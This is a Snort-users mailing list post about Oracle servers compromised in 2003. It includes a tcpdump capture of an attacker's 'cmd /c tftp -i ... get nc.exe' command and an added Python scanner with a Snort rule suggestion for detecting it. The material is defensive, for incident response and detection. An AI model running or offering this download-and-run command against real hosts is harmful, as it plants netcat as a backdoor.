[Snort-users] Oracle Compromise (Tftp + Netcat)

Dusty Hall halljer at ...8709...
Wed Apr 16 06:59:08 EDT 2003


Several of our Oracle systems were compromised last week and I'm
curious to know if anyone else has been hit with this attack or could
point me to the exploit information. I'm guessing it's "CERT Advisory
CA-2003-05" but I'm not 100% sure. Any advice would be greatly
appreciated.

Here's the payload (post compromise):

03:47:59.280516 <SOMEOTHERHOST>.4804 > <OURHOST>.1181: P 2735894114:2735894200(86) ack 1993726960 win 64208 (DF)
0x0000   4500 007e 6450 4000 7206 ca2e 3ea3 d5c5        E..~dP@.r...>...
0x0010   83cc 41c6 12c4 049d a312 6e62 76d5 dbf0        ..A.......nbv...
0x0020   5018 fad0 1aa0 0000 0056 0000 0600 0000        P........V......
0x0030   0000 07fe 4063 6d64 202f 6320 7466 7470        ....@cmd./c.tftp
0x0040   202d 6920 3632 2e31 3633 2e32 3133 2e31        .-i.XX.XXX.213.1
0x0050   3937 2067 6574 2077 696e 646f 7773 2f6e        97.get.windows/n
0x0060   6574 6361 742f 6e63 2e65 7865 2025 7465        etcat/nc.exe.%te
0x0070   6d70 255c 6e05 632e 6578 6500 0131             mp%\n.c.exe..1

Thanks,

-Dusty
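Added example (not part of Dusty's post and not Snort code): the dump above is only useful to a defender once the hex column is turned back into bytes, because the ASCII column masks spaces and control bytes as '.'. The script below parses one packet of "tcpdump -X" output from the hex column, renders the ASCII column the same way tcpdump does so the two can be compared, and then flags the post-compromise pattern shown in the post (a shell spawn followed by a tftp "get" of a file such as nc.exe), pulling out the download server and file names for an incident report. The sample dump it runs on is constructed for this example: it carries only a TCP payload, no IP/TCP headers, and uses the documentation address 192.0.2.10 in place of a real download host.

```python
import re

# Constructed sample in the shape of old-style "tcpdump -X" output.  It is NOT
# the dump from the post: only the TCP payload is shown (no IP/TCP headers) and
# the documentation address 192.0.2.10 stands in for the download server.
SAMPLE_DUMP = """\
03:47:59.280516 <SOMEOTHERHOST>.4804 > <OURHOST>.1181: P 1:51(50) ack 1 win 64208 (DF)
0x0000   636d 6420 2f63 2074 6674 7020 2d69 2031        cmd./c.tftp.-i.1
0x0010   3932 2e30 2e32 2e31 3020 6765 7420 6e63        92.0.2.10.get.nc
0x0020   2e65 7865 2025 7465 6d70 255c 6e63 2e65        .exe.%temp%\\nc.e
0x0030   7865                                           xe
"""

# "0x0010" (tcpdump of 2003) or "0x0010:" (newer releases print a colon)
OFFSET_FIELD = re.compile(r"0x[0-9a-fA-F]{4}:?")


def parse_tcpdump_x(text):
    """Return the bytes encoded in the hex column of one packet's tcpdump -X dump.

    Only lines that start with an 0xNNNN offset are used.  The ASCII column is
    deliberately ignored: tcpdump prints '.' for every non-graphic byte, spaces
    included, so it cannot be trusted to recover the payload.
    """
    data = bytearray()
    for line in text.splitlines():
        # offset, hex groups and ASCII column are separated by runs of 2+ spaces
        fields = re.split(r"\s{2,}", line.strip())
        if len(fields) < 2 or not OFFSET_FIELD.fullmatch(fields[0]):
            continue
        offset = int(fields[0].rstrip(":"), 16)
        if offset != len(data):
            raise ValueError("offset 0x%04x does not follow the bytes parsed so far" % offset)
        data += bytes.fromhex(fields[1].replace(" ", ""))
    return bytes(data)


def ascii_column(chunk):
    """Render bytes the way tcpdump's ASCII column does (isgraph() or '.')."""
    return "".join(chr(b) if 0x21 <= b <= 0x7E else "." for b in chunk)


# a command-line token ends at whitespace or at a NUL, so the match never runs
# into whatever protocol bytes follow the command string (cf. the post's dump)
TOKEN = rb"[^\s\x00]+"
TFTP_FETCH = re.compile(
    rb"tftp(?:\.exe)?\s+(?:-i\s+)?(?P<server>%s)\s+get\s+(?P<remote>%s)(?:\s+(?P<local>%s))?"
    % (TOKEN, TOKEN, TOKEN),
    re.IGNORECASE,
)
SHELL_SPAWN = re.compile(rb"cmd(?:\.exe)?\s+/c\b", re.IGNORECASE)


def inspect_payload(data):
    """Flag the post's tool-download pattern (cmd /c -> tftp ... get <file>).

    Returns a dict describing the match, or None when nothing matched.
    """
    m = TFTP_FETCH.search(data)
    if not m:
        return None

    def group_text(name):
        return (m.group(name) or b"").decode("ascii", "replace")

    finding = {
        "shell_spawn": SHELL_SPAWN.search(data) is not None,
        "server": group_text("server"),
        "remote_file": group_text("remote"),
        "local_file": group_text("local"),
    }
    # netcat fetched over tftp is exactly what the post's dump shows
    finding["netcat"] = finding["remote_file"].lower().endswith("nc.exe")
    return finding


def scan_dump(text):
    """Parse one tcpdump -X packet dump and inspect its bytes."""
    return inspect_payload(parse_tcpdump_x(text))


if __name__ == "__main__":
    payload = parse_tcpdump_x(SAMPLE_DUMP)
    print(ascii_column(payload))
    print(scan_dump(SAMPLE_DUMP))
```

The two literals the scanner keys on are also the ones to put into a Snort rule for this traffic, e.g. `content:"tftp -i"; nocase;` followed by `content:"get"; nocase; distance:0;` in the same rule, which is the usual way to turn a post-compromise dump like this into an alert on the next attempt.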